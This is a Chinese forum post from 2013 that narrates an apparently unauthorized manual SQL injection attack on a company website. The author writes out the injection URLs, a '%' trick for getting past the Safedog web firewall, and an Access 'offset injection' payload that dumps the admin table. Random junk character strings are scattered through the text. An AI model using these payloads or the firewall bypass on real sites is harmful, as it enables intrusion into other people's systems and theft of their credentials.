找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2028|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
; M( w( A. U2 O. b  f0 s0 O
* a* C4 D% x0 c) h  j+ a4 K, d, K, P% j' M
顺手加个admin
# V$ U" q6 H  i0 K0 m1 H* x/ f* a$ T3 e1 p5 e# M) B: B' g, a

: Q% i) A- V, O' c: z) @默认后台。
! h9 o6 p: Z/ q7 a% q5 P回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
% n+ Z; K5 N2 c
' i4 V( @0 @5 R) }
  c7 S* J4 T  N9 H! A
0 {: U. C8 H8 T* b/ C所以就不用御剑扫了,待会直接封IP。
+ D- U8 `" X8 i ' `1 g9 d9 N* Z! U9 K
用order by语句判断是否存在注入。; T6 f( V' L* G
http://www.xxx.com /product_show.asp?id=997 order by 1
3 E) g9 @1 U; x3 o: G2 ?1 ^. xhttp://www.xxx.com /product_show.asp?id=997 order by 100
' V( V+ v2 b/ M3 B1 t/ q现在存在注入,经测试后发现是9个字段。6 x  ~( E& Q4 c+ e4 z* ?, r2 Z# S
: ]! ^, V3 c" h9 L3 A" @
接下来进行联合查询,猜是否存在admin表。0 h% V0 N/ @  j; [( H4 W) f
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​0 A% X) t' L/ f$ _' u8 k
# @( S! O3 M/ \, A" _. O
3 `" ]5 h. L' \8 G/ u

. q* S! N. {1 `' k9 W在select中间加个%,se%lect绕过安全狗。
; e( Q' o! S  y$ B; b- g( }
* z! Q. h$ i3 U+ S8 `( y+ l+ W4 U1 i( y- r0 c2 u
发现存在admin表,然后开始手工猜常用的字段。
1 h' X0 n: ]/ N纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
0 R; {8 ^" Q0 L: n% W
) q+ j) L$ Z5 ?  D) M1 C! d突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
  z5 q9 K+ J. G( Z; c/ J . B7 U" H- G% g# R# F
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
- ~4 o- v3 c9 T2 i' k# ghttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin) o! v& F6 [6 d6 ?4 `) a
好了,敏感内容出显了。​+ r1 O! S# H) l  k& C
1 G% K# h" W1 d1 {2 r; D

0 V; d5 i$ E: u7 i& w/ _7 o! Q5 {2 ^( ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表